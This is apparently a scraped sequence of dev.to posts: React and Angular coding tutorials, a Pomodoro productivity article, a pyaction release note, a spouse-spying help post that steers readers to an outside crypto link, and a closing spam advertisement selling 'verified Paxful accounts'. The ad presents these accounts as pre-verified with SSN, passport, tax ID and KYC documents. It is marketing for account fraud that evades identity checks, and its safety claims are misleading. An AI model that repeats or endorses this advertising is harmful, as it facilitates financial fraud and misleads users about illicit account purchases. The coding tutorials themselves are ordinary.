```javascript
if (isLoggedIn) {
document.getElementById('welcome').textContent = 'Welcome, User!';
} else {
document.getElementById('welcome').textContent = 'Please log in.';
}
```
### React Conversion
```javascript
const [isLoggedIn, setIsLoggedIn] = useState(false);
return (
<div id="welcome">
{isLoggedIn ? 'Welcome, User!' : 'Please log in.'}
</div>
);
```
### 15. **Modal Windows**
- **Example**: Displaying a modal window based on user actions.
- **Pattern**: Toggling visibility of modal elements.
### JavaScript Example
```javascript
let modal = document.getElementById('modal');
let openButton = document.getElementById('openModal');
let closeButton = document.getElementById('closeModal');
openButton.addEventListener('click', function() {
modal.style.display = 'block';
});
closeButton.addEventListener('click', function() {
modal.style.display = 'none';
});
```
### React Conversion
```javascript
const [isModalOpen, setIsModalOpen] = useState(false);
return (
<>
<button id="openModal" onClick={() => setIsModalOpen(true)}>Open Modal</button>
{isModalOpen && (
<div id="modal">
<button id="closeModal" onClick={() => setIsModalOpen(false)}>Close</button>
<div>Modal Content</div>
</div>
)}
</>
);
```
### 16. **Accordion Panels**
- **Example**: Expanding or collapsing accordion panels.
- **Pattern**: Toggling classes or styles for panel visibility.
### JavaScript Example
```javascript
let accordion = document.getElementById('accordion');
accordion.addEventListener('click', function() {
let panel = this.nextElementSibling;
panel.style.display = panel.style.display === 'block' ? 'none' : 'block';
});
```
### React Conversion
```javascript
const [isPanelOpen, setIsPanelOpen] = useState(false);
return (
<div id="accordion" onClick={() => setIsPanelOpen(!isPanelOpen)}>
Accordion Header
<div style={{ display: isPanelOpen ? 'block' : 'none' }}>
Accordion Content
</div>
</div>
);
```
### 17. **Tabs Navigation**
- **Example**: Switching content based on selected tab.
- **Pattern**: Changing the visible content based on active tab index.
### JavaScript Example
```javascript
let tabs = document.querySelectorAll('.tab');
let contents = document.querySelectorAll('.content');
tabs.forEach((tab, index) => {
tab.addEventListener('click', function() {
contents.forEach(content => content.style.display = 'none');
contents[index].style.display = 'block';
});
});
```
### React Conversion
```javascript
const [activeTab, setActiveTab] = useState(0);
return (
<>
<div className="tabs">
{['Tab 1', 'Tab 2', 'Tab 3'].map((tab, index) => (
<button key={index} onClick={() => setActiveTab(index)}>{tab}</button>
))}
</div>
<div className="contents">
{activeTab === 0 && <div>Content 1</div>}
{activeTab === 1 && <div>Content 2</div>}
{activeTab === 2 && <div>Content 3</div>}
</div>
</>
);
```
### 18. **Dynamic Styling Based on State**
- **Example**: Changing styles based on state values.
- **Pattern**: Directly modifying the `style` attribute or using class toggles.
### JavaScript Example
```javascript
let box = document.getElementById('box');
box.style.backgroundColor = 'red';
```
### React Conversion
```javascript
const [color, setColor] = useState('red');
return (
<div id="box" style={{ backgroundColor: color }}>Box Content</div>
);
```
| forchapearl |
1,881,552 | Help! my husband is Spying on My iPhone from his Computer - What should I do? | Yesterday, after work, I made a shocking discovery that left me feeling completely violated and... | 0 | 2024-06-08T19:22:50 | https://dev.to/brittanyjones/help-my-husband-is-spying-on-my-iphone-from-his-computer-what-should-i-do-4anb | Yesterday, after work, I made a shocking discovery that left me feeling completely violated and betrayed. I found out that my husband has been remotely spying on my iPhone from his Mac computer.
I never imagined that my own spouse would be invading my privacy in such a blatant manner. It has left me feeling confused and unsure of how to handle the situation. I'm from Perth in Australia. Should I confront him about it? Seek counseling? Or perhaps even consider legal action? what are the implications?
I stumbled upon an article (Full Cryptoleet Mag Article Here - https://cryptoleet.pro/2024/06/01/are-you-safe-on-your-iphone/) that suggests this type of behavior is becoming a concerning trend in Australia. I was intrigued by the article because the description looks and matches exactly like the software I saw him using. Should I spy on him to gather evidence too? or maybe i am too paranoid?
I'm reaching out to the community for advice and support. Has anyone else experienced a similar breach of trust? How did you handle it? What do you think I should do in this situation? Any guidance or insight would be greatly appreciated. | brittanyjones | |
1,881,509 | pyaction 4.31.0 Released | TL;DR I just released pyaction 4.31.0, a Docker container with Python, git, and the GitHub... | 21,258 | 2024-06-08T19:13:49 | https://dev.to/cicirello/pyaction-4310-released-548a | github, docker, python, showdev | ## TL;DR
I just released [pyaction](https://github.com/cicirello/pyaction) 4.31.0, a [Docker container with Python, git, and the GitHub CLI](https://dev.to/cicirello/pyaction-a-docker-container-with-python-git-and-the-github-cli-930). You can pull pyaction from either the [GitHub Container Registry](https://github.com/cicirello/pyaction/pkgs/container/pyaction) or from [Docker Hub](https://hub.docker.com/r/cicirello/pyaction).
This release updates the GitHub CLI included in the container to 2.50.0.
## Changelog 4.31.0 - 2024-06-08
### Changed
* Bumped GitHub CLI to 2.50.0.
## Current Version List
This latest release of pyaction includes the following:
* Python 3.12.3
* [GitHub CLI 2.50.0](https://github.com/cli/cli/releases/tag/v2.50.0)
* git 2.39.2
* curl 7.88.1
* gpg 2.2.40
## More Information
Please consider starring pyaction's GitHub repository:
{% github cicirello/pyaction %}
For more information, see pyaction's webpage:
{% embed https://actions.cicirello.org/pyaction/ %}
## Where You Can Find Me
Follow me [here on DEV](https://dev.to/cicirello) and on [GitHub](https://github.com/cicirello):
{% user cicirello %}
| cicirello |
1,881,505 | Boost Your Developer Productivity with the Pomodoro Technique | Hey there, developers! In our fast-paced world, managing time efficiently is crucial for keeping... | 0 | 2024-06-08T19:12:57 | https://dev.to/shamimbinnur/boost-your-developer-productivity-with-the-pomodoro-technique-1dh7 | productivity, pomodoro, workplace, webdev | Hey there, developers! In our fast-paced world, managing time efficiently is crucial for keeping productivity high and avoiding burnout. One awesome method to achieve this is the Pomodoro Technique. This time management strategy breaks work into focused intervals, usually 25 minutes long, separated by short breaks. Developed by Francesco Cirillo in the late 1980s, this technique is perfect for developers who need to balance deep focus with regular mental breaks. Let's dive into how you can use the Pomodoro Technique to boost your productivity and improve your work-life balance.
## Why the Pomodoro Technique Works for Developers
The Pomodoro Technique is a great fit for the cognitive demands of software development. Here’s why it rocks:
**1. Enhanced Focus:** Working in short, intense bursts helps maintain concentration and reduces the temptation to multitask.
**2. Reduced Burnout:** Regular breaks prevent mental fatigue, ensuring sustained daily productivity.
**3. Better Time Estimation:** By tracking the number of pomodoros required for tasks, you can improve your ability to estimate project timelines.
**4. Distraction Management:** The technique encourages dealing with distractions during breaks, allowing uninterrupted work sessions.
## Implementing the Pomodoro Technique
### Step-by-Step Guide
**1. Select a Task:** Pick a specific development task, like writing a feature, fixing a bug, or reviewing code.
**2. Set the Timer:** Set a timer for 25 minutes. Many developers find physical timers or simple timer apps useful for minimizing distractions. For an online Pomodoro timer, I like https://zoneout.me/pomo because it’s super user-friendly.
**3. Work Intensely:** Focus solely on the task at hand. Avoid checking emails, messages, or any other interruptions. If you’re using ZoneOut and have a secondary screen, make the timer full-screen to stay aware of time without other distractions.
**4. Take a Short Break:** When the timer rings, take a 5-minute break. Step away from your computer, stretch, or grab a coffee.
**5. Repeat:** After the short break, start another Pomodoro. After completing four Pomodoros, take a longer break of 15-30 minutes to recharge.
## Tips for Developers
**Group Smaller Tasks:** Combine smaller tasks, like responding to emails or writing documentation, into a single Pomodoro session to maintain flow.
**1. Plan Pomodoros in Advance:** At the start of your day, outline the tasks you aim to complete and allocate Pomodoros accordingly. This helps prioritize and manage time effectively.
**2. Use Tools:** Utilize Pomodoro-specific apps like ZoneOut or Focus Booster that integrate with task management tools like Jira or Trello, providing seamless tracking and reporting.
**3. Customize Intervals:** While 25 minutes is the traditional length, adjust the duration based on your task and concentration levels. Some developers prefer longer intervals for deep work sessions.
**4. Physical Activity During Breaks:** Engage in physical activities like walking, stretching, or quick exercises during breaks to rejuvenate your mind and body.
## Overcoming Common Challenges
### Interruptions
If an interruption occurs during a Pomodoro, pause the timer, address the interruption, and then resume. Frequent interruptions should be noted and managed during breaks.
### Maintaining Consistency
Consistency is key. It may be challenging at first, but with practice, the technique can become a natural part of your workflow. Track your progress and adjust the technique to better suit your working style.
## Conclusion
The Pomodoro Technique is a powerful tool for developers, offering a structured approach to managing time and tasks. By breaking work into focused intervals and incorporating regular breaks, you can enhance productivity, maintain high-quality output, and avoid burnout. But don’t think it’s just for developers—this technique works wonders for anyone looking to improve their focus and productivity. Start small, adapt the technique to your needs, and watch as your productivity soars.
For further reading and detailed guides on the Pomodoro Technique, check out these resources:
1. https://en.wikipedia.org/wiki/Pomodoro_Technique
2. https://zoneout.me/pomo?section=what_is_pomodoro
3. https://thequietworkplace.com/blog/pomodoro-technique
4. https://thesmallsuccess.com/pomodoro-technique/#google_vignette
5. https://www.mometrix.com/blog/pomodoro-technique
Implement the Pomodoro Technique today and take the first step towards more focused, efficient, and enjoyable coding sessions. Happy coding!
| shamimbinnur |
1,881,499 | react 19 useContext, useReducer & localstorage | Solving the State Management Problem in React: A Deep Dive into Centralized Notes... | 0 | 2024-06-08T19:12:30 | https://dev.to/codewithjohnson/react-19-usecontext-usereducer-localstorage-2a3o | webdev, javascript, react, beginners | ## Solving the State Management Problem in React: A Deep Dive into Centralized Notes Management
### Introduction
As applications grow, managing state across various components becomes increasingly complex. Prop drilling can make your codebase cumbersome, and the lack of persistence between sessions can frustrate users who lose their data upon refreshing the browser. To tackle these issues, we'll explore a robust solution using React context, hooks, and reducers to manage and persist notes in a structured and maintainable way.
**you might just need this if you are experienced**

### The Problem
1. **Prop Drilling**: Passing state down multiple levels of components (prop drilling) leads to cluttered and hard-to-maintain code.
2. **State Persistence**: Without persistent storage, data is lost when the user refreshes or closes the browser.
3. **State Initialization**: Initializing state on every render can lead to performance issues.
4. **Global State Access**: Components need a straightforward way to access and update global state.
5. **Error Handling**: Reading from or writing to storage can lead to application crashes if not handled properly.
6. **Scalability**: As the application grows, state management becomes harder to maintain and scale.
### Our Solution: Centralized Notes Management
To address these problems, we’ll use a combination of React's `createContext`, `useContext`, `useReducer`, and `useEffect` hooks along with `localStorage` for persistence. Here’s a detailed breakdown of the approach:
### 1. Centralized State Management
We start by creating a context to centralize the state:
```jsx
import { createContext, useContext, useReducer, useEffect } from "react";
import NoteReducer from "../reducers/NoteReducer";
import InitialNotes from "../state/InitialNotes";
const NoteContext = createContext(null);
const NoteDispatchContext = createContext(null);
```
By using `createContext`, we ensure that our state and dispatch functions are accessible globally within our application.
### 2. Persistence with Local Storage
We use `localStorage` to ensure that notes data persists across sessions:
```jsx
const getStoredNotes = (initialNotes = InitialNotes) => {
try {
const storedNotes = localStorage.getItem("storedNotes");
return storedNotes ? JSON.parse(storedNotes) : initialNotes;
} catch (error) {
console.error("Error reading from localStorage:", error);
return initialNotes;
}
};
```
This function retrieves notes from `localStorage` or falls back to initial notes if an error occurs, ensuring robustness.
### 3. Lazy State Initialization
By initializing the state lazily, we improve performance:
```jsx
const NotesProvider = ({ children }) => {
const [notes, dispatch] = useReducer(NoteReducer, undefined, getStoredNotes);
useEffect(() => {
try {
localStorage.setItem("storedNotes", JSON.stringify(notes));
} catch (error) {
console.error("Error saving to localStorage:", error);
}
}, [notes]);
return (
<NoteContext.Provider value={notes}>
<NoteDispatchContext.Provider value={dispatch}>
{children}
</NoteDispatchContext.Provider>
</NoteContext.Provider>
);
};
```
The `useReducer` hook with lazy initialization ensures that state is only loaded from `localStorage` once when the component mounts.
### 4. Global Access and Modification
To simplify state access and updates, we create custom hooks:
```jsx
export const useNotesContext = () => useContext(NoteContext);
export const useNotesDispatchContext = () => useContext(NoteDispatchContext);
```
These hooks allow any component to easily access and modify the notes state.
### 5. Structured State Updates
Using a reducer centralizes the logic for state updates:
```jsx
// NoteReducer.js
const NoteReducer = (state, action) => {
switch (action.type) {
case 'ADD_NOTE':
return [...state, action.payload];
case 'DELETE_NOTE':
return state.filter(note => note.id !== action.payload.id);
default:
return state;
}
};
export default NoteReducer;
```
This pattern ensures that state management is predictable and easy to maintain.
### 6. Error Handling for Data Persistence
By wrapping `localStorage` operations in try-catch blocks, we prevent the application from crashing due to storage-related errors:
```jsx
useEffect(() => {
try {
localStorage.setItem("storedNotes", JSON.stringify(notes));
} catch (error) {
console.error("Error saving to localStorage:", error);
}
}, [notes]);
```
### 7. Optimization for Re-renders
The `useEffect` hook with a dependency on the notes state ensures that `localStorage` is updated only when the notes state changes, minimizing unnecessary operations:
```jsx
useEffect(() => {
try {
localStorage.setItem("storedNotes", JSON.stringify(notes));
} catch (error) {
console.error("Error saving to localStorage:", error);
}
}, [notes]);
```
### 8. Security Consideration
While `localStorage` is convenient, it's important to consider security for sensitive data. For more secure storage, consider using encrypted storage options or other secure methods.
### 9. Scalability and Maintenance
The context and reducer pattern makes the codebase scalable and maintainable. Adding new features or modifying existing logic becomes easier as the state management logic is centralized and well-structured.
### Conclusion
By leveraging React context, hooks, and reducers, we can create a robust solution for managing and persisting notes. This approach addresses common problems like prop drilling, state persistence, and performance issues, while providing a scalable and maintainable architecture. Whether you're building a simple note-taking app or a more complex application, these principles will help you manage state effectively and improve the overall user experience.
| codewithjohnson |
1,881,504 | Angular Tutorial: Router Link and Accessibility | Making apps that are accessible for everyone can be a challenge for many developers. If we don’t have... | 0 | 2024-06-08T19:07:06 | https://briantree.se/angular-tutorial-router-link-and-accessibility/ | angular, angulardevelopers, a11y, webdev | Making apps that are accessible for everyone can be a challenge for many developers. If we don’t have any real issues using devices or seeing what’s on the display, it can be easy for us to overlook simple things that are really important for those of us who don’t have this luxury. So, we need to continually learn how we can be better at this and how we can leverage the tools we already have to help. In this example, I’ll show you how we can easily make an existing [breadcrumb list](https://www.w3.org/WAI/ARIA/apg/patterns/breadcrumb/examples/breadcrumb/) component more accessible for everyone, with a few directives from the [Angular Router Module](https://angular.dev/api/router/RouterModule). Alright, let’s get to it.
{% embed https://www.youtube.com/embed/56ADyGKS-DQ %}
## The Demo Application
For the example in this tutorial we’ll be using [this simple demo application](https://stackblitz.com/edit/stackblitz-starters-ezbh7m?file=src%2Fbreadcrumbs%2Fbreadcrumbs.component.html). We have a few different pages that we can navigate to. This app has already been set up with [routing](https://angular.dev/guide/routing) so when we click the links in the main nav we properly navigate to the appropriate page.
<div>
<img src="https://briantree.se/assets/img/content/uploads/2024/06-08/demo-1.gif" alt="Example of a simple application built with Angular and the Angular Routing Module" width="1076" height="1038" style="width: 100%; height: auto;">
</div>
We also have the breadcrumbs region here at the top of each page.
<div>
<img src="https://briantree.se/assets/img/content/uploads/2024/06-08/demo-2.png" alt="Example of a breadcrumb list built with Angular and the Angular Routing Module" width="1084" height="576" style="width: 100%; height: auto;">
</div>
Well these links are missing some important accessibility features that will make them easier to read and understand for all users, not just those with disabilities.
For one, we should probably have a visible style representation for the current page in the breadcrumb list. That way, sighted users will be able to easily understand where they are in the list at a glance.
But for those who won’t be able to see this style, they won’t be able to understand it either. So, we’ll need to add some additional [ARIA](https://developer.mozilla.org/en-US/docs/Web/Accessibility/ARIA) information to the code.
The good news for us is that this is all pretty easy when using the [RouterLink directive](https://angular.dev/api/router/RouterLink) which is what we’ll be doing in this example. Ok, let’s look at some code.
## The Existing Code
For this app we have several components for the different pages. Let’s take a look at the [post component](https://stackblitz.com/edit/stackblitz-starters-ezbh7m?file=src%2Fpages%2Fblog%2Fpost%2Fpost.component.html) which is what’s used when navigating to an individual blog post.
At the top of the template, we have a breadcrumbs component.
#### post.component.html
```html
<app-page-layout>
<app-breadcrumbs [breadcrumbs]="breadcrumbs"></app-breadcrumbs>
...
</app-page-layout>
```
This component has a “breadcrumbs” [input()](https://angular.dev/guide/signals/inputs). Let’s look at how our [breadcrumbs are being set](https://stackblitz.com/edit/stackblitz-starters-ezbh7m?file=src%2Fpages%2Fblog%2Fpost%2Fpost.component.ts).
Ok, here we are creating an array of “Link” objects, each with a label and a path. In this case we have two links for “blog” and “post”.
#### post.component.ts
```typescript
protected breadcrumbs: Link[] = [
{
label: 'Blog',
path: '/blog'
},
{
label: 'Post',
path: '/blog/post'
}
];
```
Now, we can see these links in our breadcrumbs, but there’s also a “home” link which we’re not including in this array.
<div>
<img src="https://briantree.se/assets/img/content/uploads/2024/06-08/demo-3.gif" alt="Highlighting dynamic breadcrumb links with static homepage link" width="1296" height="422" style="width: 100%; height: auto;">
</div>
Let’s look at the [breadcrumbs component](https://stackblitz.com/edit/stackblitz-starters-ezbh7m?file=src%2Fbreadcrumbs%2Fbreadcrumbs.component.html) to see why. Here in the template, since the home page is the root route for the app, it will always be part of the breadcrumbs so it’s hardcoded in.
#### breadcrumbs.component.html
```html
<ul>
<li>
<a [routerLink]="'/'">Home</a><span>></span>
</li>
...
</ul>
```
Then we have loop where we loop out the links provided from the [input()](https://angular.dev/guide/signals/inputs). For these links we can see that they are already configured using the [routerLink directive](https://angular.dev/api/router/RouterLink).
```html
<ul>
...
@for (breadcrumb of breadcrumbs(); track breadcrumb; let last = $last) {
<li>
<a [routerLink]="breadcrumb.path">{{ breadcrumb.label }}</a>@if (!last) {<span>></span>}
</li>
}
</ul>
```
The paths are set with a slash for the home page:
```html
<a [routerLink]="'/'">Home</a>
```
And with the path provided from the [input()](https://angular.dev/guide/signals/inputs) for dynamic breadcrumbs:
```html
<a [routerLink]="breadcrumb.path">{{ breadcrumb.label }}</a>
```
Ok, so that’s how everything is set up currently.
## Adding an “active” Class with the routerLinkActive Directive
The first thing we’ll do is add the “active” visual styles to our links when they are active. Since we’re using the [routerLink directive](https://angular.dev/api/router/RouterLink), we will be able to add a class for this state pretty easily with the [routerLinkActive directive](https://angular.dev/guide/routing/router-reference#active-router-links).
This directive will automatically add a class when the link becomes active and will then remove it when it’s no longer active.
Ok, here in the [CSS for the breadcrumbs component](https://stackblitz.com/edit/stackblitz-starters-ezbh7m?file=src%2Fbreadcrumbs%2Fbreadcrumbs.component.scss), I’ve added some styles for the “active” state using an “active” class.
#### breadcrumbs.component.scss
```scss
a.active {
color: #999;
font-style: italic;
}
```
This is the class that we’ll need to add dynamically with the [routerLinkActive directive](https://angular.dev/guide/routing/router-reference#active-router-links). All we need to do to pull this off is switch back to the template, and then add the [routerLinkActive directive](https://angular.dev/guide/routing/router-reference#active-router-links) to our breadcrumb links. This directive takes in an input of one or more strings for the class or classes that it will bind when the link is active, so we’ll give it our “active” class name.
#### breadcrumbs.component.html
```html
<a
[routerLink]="breadcrumb.path"
routerLinkActive="active">
...
</a>
```
That’s it.
Well that sort of worked, some styles were applied but they shouldn’t be applying to both the blog and the post link right? They should only apply to the post link since that’s the current page.
<div>
<img src="https://briantree.se/assets/img/content/uploads/2024/06-08/demo-4.gif" alt="Example of adding an active class and matching too many links with the routerLinkActive directive" width="1686" height="608" style="width: 100%; height: auto;">
</div>
Well, this is happening because by default, if the URL is matched at all, even if it’s just a subset of the full URL, like it is in this case, it will be active.
<div>
<img src="https://briantree.se/assets/img/content/uploads/2024/06-08/demo-5.gif" alt="Calling out that the blog breadcrumb path is included in the blog post url causing it to highlighted active when we don't want it to be" width="1686" height="608" style="width: 100%; height: auto;">
</div>
In this case, the blog page path is:
```
https://stackblitzstartersfkak21-wiab--4200--c3e5e364.local-credentialless.webcontainer.io/blog
```
And, the post page path is:
```
https://stackblitzstartersfkak21-wiab--4200--c3e5e364.local-credentialless.webcontainer.io/blog/post?title=Instagram%20Told%20Ars%20Technica%20it%20was%20%22Exploring%22%20More%20Ways%20for%20Users%20to%20Control%20Embedding
```
So, the post path contains the blog path too resulting with both links being "active".
### Adding “Active” State for Links Only When They are an “Exact Match” with the routerLinkActiveOptions input
Well this is an easy fix for us. The [routerLinkActive directive](https://angular.dev/guide/routing/router-reference#active-router-links) has an input where we can pass options for the active link. One of the options we can provide will check if the path is an exact match before marking it active.
To add this, we just need to add the routerLinkActiveOptions input to our link. Then we’ll pass it an object with “exact” and we’ll set it to true.
```html
<a
[routerLink]="breadcrumb.path"
routerLinkActive="active"
[routerLinkActiveOptions]="{ exact: true }">
...
</a>
```
So now the URL will need to be an exact match for it to be active, it can no longer be a subset of the URL.
So, here's how it looks now.
<div>
<img src="https://briantree.se/assets/img/content/uploads/2024/06-08/demo-6.gif" alt="Example of adding routerLinkActiveOptions exact to match only when the path is an exact match" width="1898" height="480" style="width: 100%; height: auto;">
</div>
Not quite there are we? Now neither link is active.
Well, this is happening because we have a query string on the URL for our post. So we’re never going to get an exact match here.
<div>
<img src="https://briantree.se/assets/img/content/uploads/2024/06-08/demo-7.gif" alt="Example of the query string preventing the exact match on the post URL" width="1898" height="480" style="width: 100%; height: auto;">
</div>
So, what I’m going to do to fix this is, I’m going to modify the [“Link” interface](https://stackblitz.com/edit/stackblitz-starters-fkak21?file=src%2Flink.ts). I’m going to add an optional “exact” property.
#### link.ts
```typescript
export interface Link {
...
exact?: boolean;
}
```
Then, let’s go to our breadcrumbs array for the [post page](https://stackblitz.com/edit/stackblitz-starters-fkak21?file=src%2Fpages%2Fblog%2Fpost%2Fpost.component.ts). On the post link, I’ll set exact to false.
#### post.component.ts
```typescript
protected breadcrumbs: Link[] = [
...,
{
label: 'Post',
path: '/blog/post',
exact: false
}
];
```
Ok, now let’s switch back to the [breadcrumbs component](https://stackblitz.com/edit/stackblitz-starters-fkak21?file=src%2Fbreadcrumbs%2Fbreadcrumbs.component.html). Let's switch the logic so that if exact is set in the link, it will use the value provided, if not it will be true.
#### breadcrumbs.component.html
```html
<a
[routerLink]="breadcrumb.path"
routerLinkActive="active"
[routerLinkActiveOptions]="{ exact: breadcrumb.exact ?? true }">
...
</a>
```
Now, after we save, the "active" class should only be applied to the post link.
<div>
<img src="https://briantree.se/assets/img/content/uploads/2024/06-08/demo-8.png" alt="Example of the active styles now being applied correctly" width="1646" height="602" style="width: 100%; height: auto;">
</div>
And when we navigate around, the other pages should work correctly too.
Ok, so that provides us with a visual state for the active link, but for those who can’t see, the breadcrumbs may be confusing to them. So, in order to fix this, we need to add some additional [ARIA](https://developer.mozilla.org/en-US/docs/Web/Accessibility/ARIA) information.
## Adding ARIA for Enhanced Accessibility
The first thing we need to do really doesn’t have much to do with Angular. We just need to add an [`aria-label`](https://developer.mozilla.org/en-US/docs/Web/Accessibility/ARIA/Attributes/aria-label) attribute with a value of “Breadcrumb” to the element containing the list of links. This just provides the user with more information around what type of navigation this is.
#### breadcrumbs.component.html
```html
<nav aria-label="Breadcrumb">
...
</nav>
```
### Adding the aria-current Attribute with the ariaCurrentWhenActive Input
Ok, the next thing we need to do is add an [`aria-current`](https://developer.mozilla.org/en-US/docs/Web/Accessibility/ARIA/Attributes/aria-current) attribute with a value of “page” to the current link in the breadcrumbs.
More good news for us, this is really easy with the [ariaCurrentWhenActive](https://angular.dev/best-practices/a11y#active-links-identification) input for the [routerLinkActive directive](https://angular.dev/guide/routing/router-reference#active-router-links).
All we need to do is add the input, and then give it a value of “page”. It’s that simple.
```html
<a
[routerLink]="breadcrumb.path"
routerLinkActive="active"
[routerLinkActiveOptions]="{ exact: breadcrumb.exact ?? true }"
ariaCurrentWhenActive="page">
...
</a>
```
Now, after we save, nothing will change visually because all we did was add an aria attribute when the item is active. We’ll need to inspect the code to see this. We should see that the post link now correctly has an aria-current attribute. And, if we look at the other links, we should not see this attribute applied
<div>
<img src="https://briantree.se/assets/img/content/uploads/2024/06-08/demo-9.gif" alt="Example of the aria-current attribute being properly applied to the active breadcrumb link using the ariaCurrentWhenActive input for the routerLinkActive directive" width="1390" height="610" style="width: 100%; height: auto;">
</div>
## Conclusion
So, sometimes we need to add both visual and non-visual feedback for our users to make it all make sense for everyone. The good news is that the Angular team is continually working on ways to make this easy for us by adding the things we need right into the framework. And that’s a really good thing for everyone, but it is our job to make sure that we are thinking about this and doing our part. And I hope this example helps you do exactly that!
## Want to See It in Action?
Check out the demo code and examples of these techniques in the in the Stackblitz example below. If you have any questions or thoughts, don’t hesitate to leave a comment.
{% embed https://stackblitz.com/edit/stackblitz-starters-fkak21?ctl=1&embed=1&file=src%2Fbreadcrumbs%2Fbreadcrumbs.component.html %}
---
## Found This Helpful?
If you found this article helpful and want to show some love, you can always [buy me a coffee!]( https://buymeacoffee.com/briantreese)
| brianmtreese |
1,881,506 | Buy Verified Paxful Account | https://dmhelpshop.com/product/buy-verified-paxful-account/ Buy Verified Paxful Account There are... | 0 | 2024-06-08T19:01:03 | https://dev.to/reideweide55/buy-verified-paxful-account-1f52 | tutorial, react, python, ai | ERROR: type should be string, got "https://dmhelpshop.com/product/buy-verified-paxful-account/\n\n\n\n\nBuy Verified Paxful Account\nThere are several compelling reasons to consider purchasing a verified Paxful account. Firstly, a verified account offers enhanced security, providing peace of mind to all users. Additionally, it opens up a wider range of trading opportunities, allowing individuals to partake in various transactions, ultimately expanding their financial horizons.\n\nMoreover, Buy verified Paxful account ensures faster and more streamlined transactions, minimizing any potential delays or inconveniences. Furthermore, by opting for a verified account, users gain access to a trusted and reputable platform, fostering a sense of reliability and confidence.\n\nLastly, Paxful’s verification process is thorough and meticulous, ensuring that only genuine individuals are granted verified status, thereby creating a safer trading environment for all users. Overall, the decision to Buy Verified Paxful account can greatly enhance one’s overall trading experience, offering increased security, access to more opportunities, and a reliable platform to engage with. Buy Verified Paxful Account.\n\nBuy US verified paxful account from the best place dmhelpshop\nWhy we declared this website as the best place to buy US verified paxful account? Because, our company is established for providing the all account services in the USA (our main target) and even in the whole world. With this in mind we create paxful account and customize our accounts as professional with the real documents. Buy Verified Paxful Account.\n\nIf you want to buy US verified paxful account you should have to contact fast with us. Because our accounts are-\n\nEmail verified\nPhone number verified\nSelfie and KYC verified\nSSN (social security no.) verified\nTax ID and passport verified\nSometimes driving license verified\nMasterCard attached and verified\nUsed only genuine and real documents\n100% access of the account\nAll documents provided for customer security\nWhat is Verified Paxful Account?\nIn today’s expanding landscape of online transactions, ensuring security and reliability has become paramount. Given this context, Paxful has quickly risen as a prominent peer-to-peer Bitcoin marketplace, catering to individuals and businesses seeking trusted platforms for cryptocurrency trading.\n\nIn light of the prevalent digital scams and frauds, it is only natural for people to exercise caution when partaking in online transactions. As a result, the concept of a verified account has gained immense significance, serving as a critical feature for numerous online platforms. Paxful recognizes this need and provides a safe haven for users, streamlining their cryptocurrency buying and selling experience.\n\nFor individuals and businesses alike, Buy verified Paxful account emerges as an appealing choice, offering a secure and reliable environment in the ever-expanding world of digital transactions. Buy Verified Paxful Account.\n\nVerified Paxful Accounts are essential for establishing credibility and trust among users who want to transact securely on the platform. They serve as evidence that a user is a reliable seller or buyer, verifying their legitimacy.\n\nBut what constitutes a verified account, and how can one obtain this status on Paxful? In this exploration of verified Paxful accounts, we will unravel the significance they hold, why they are crucial, and shed light on the process behind their activation, providing a comprehensive understanding of how they function. Buy verified Paxful account.\n\n \n\nWhy should to Buy Verified Paxful Account?\nThere are several compelling reasons to consider purchasing a verified Paxful account. Firstly, a verified account offers enhanced security, providing peace of mind to all users. Additionally, it opens up a wider range of trading opportunities, allowing individuals to partake in various transactions, ultimately expanding their financial horizons.\n\nMoreover, a verified Paxful account ensures faster and more streamlined transactions, minimizing any potential delays or inconveniences. Furthermore, by opting for a verified account, users gain access to a trusted and reputable platform, fostering a sense of reliability and confidence. Buy Verified Paxful Account.\n\nLastly, Paxful’s verification process is thorough and meticulous, ensuring that only genuine individuals are granted verified status, thereby creating a safer trading environment for all users. Overall, the decision to buy a verified Paxful account can greatly enhance one’s overall trading experience, offering increased security, access to more opportunities, and a reliable platform to engage with.\n\n \n\nWhat is a Paxful Account\nPaxful and various other platforms consistently release updates that not only address security vulnerabilities but also enhance usability by introducing new features. Buy Verified Paxful Account.\n\nIn line with this, our old accounts have recently undergone upgrades, ensuring that if you purchase an old buy Verified Paxful account from dmhelpshop.com, you will gain access to an account with an impressive history and advanced features. This ensures a seamless and enhanced experience for all users, making it a worthwhile option for everyone.\n\n \n\nIs it safe to buy Paxful Verified Accounts?\nBuying on Paxful is a secure choice for everyone. However, the level of trust amplifies when purchasing from Paxful verified accounts. These accounts belong to sellers who have undergone rigorous scrutiny by Paxful. Buy verified Paxful account, you are automatically designated as a verified account. Hence, purchasing from a Paxful verified account ensures a high level of credibility and utmost reliability. Buy Verified Paxful Account.\n\nPAXFUL, a widely known peer-to-peer cryptocurrency trading platform, has gained significant popularity as a go-to website for purchasing Bitcoin and other cryptocurrencies. It is important to note, however, that while Paxful may not be the most secure option available, its reputation is considerably less problematic compared to many other marketplaces. Buy Verified Paxful Account.\n\nThis brings us to the question: is it safe to purchase Paxful Verified Accounts? Top Paxful reviews offer mixed opinions, suggesting that caution should be exercised. Therefore, users are advised to conduct thorough research and consider all aspects before proceeding with any transactions on Paxful.\n\n \n\nHow Do I Get 100% Real Verified Paxful Accoun?\nPaxful, a renowned peer-to-peer cryptocurrency marketplace, offers users the opportunity to conveniently buy and sell a wide range of cryptocurrencies. Given its growing popularity, both individuals and businesses are seeking to establish verified accounts on this platform.\n\nHowever, the process of creating a verified Paxful account can be intimidating, particularly considering the escalating prevalence of online scams and fraudulent practices. This verification procedure necessitates users to furnish personal information and vital documents, posing potential risks if not conducted meticulously.\n\nIn this comprehensive guide, we will delve into the necessary steps to create a legitimate and verified Paxful account. Our discussion will revolve around the verification process and provide valuable tips to safely navigate through it.\n\nMoreover, we will emphasize the utmost importance of maintaining the security of personal information when creating a verified account. Furthermore, we will shed light on common pitfalls to steer clear of, such as using counterfeit documents or attempting to bypass the verification process.\n\nWhether you are new to Paxful or an experienced user, this engaging paragraph aims to equip everyone with the knowledge they need to establish a secure and authentic presence on the platform.\n\nBenefits Of Verified Paxful Accounts\nVerified Paxful accounts offer numerous advantages compared to regular Paxful accounts. One notable advantage is that verified accounts contribute to building trust within the community.\n\nVerification, although a rigorous process, is essential for peer-to-peer transactions. This is why all Paxful accounts undergo verification after registration. When customers within the community possess confidence and trust, they can conveniently and securely exchange cash for Bitcoin or Ethereum instantly. Buy Verified Paxful Account.\n\nPaxful accounts, trusted and verified by sellers globally, serve as a testament to their unwavering commitment towards their business or passion, ensuring exceptional customer service at all times. Headquartered in Africa, Paxful holds the distinction of being the world’s pioneering peer-to-peer bitcoin marketplace. Spearheaded by its founder, Ray Youssef, Paxful continues to lead the way in revolutionizing the digital exchange 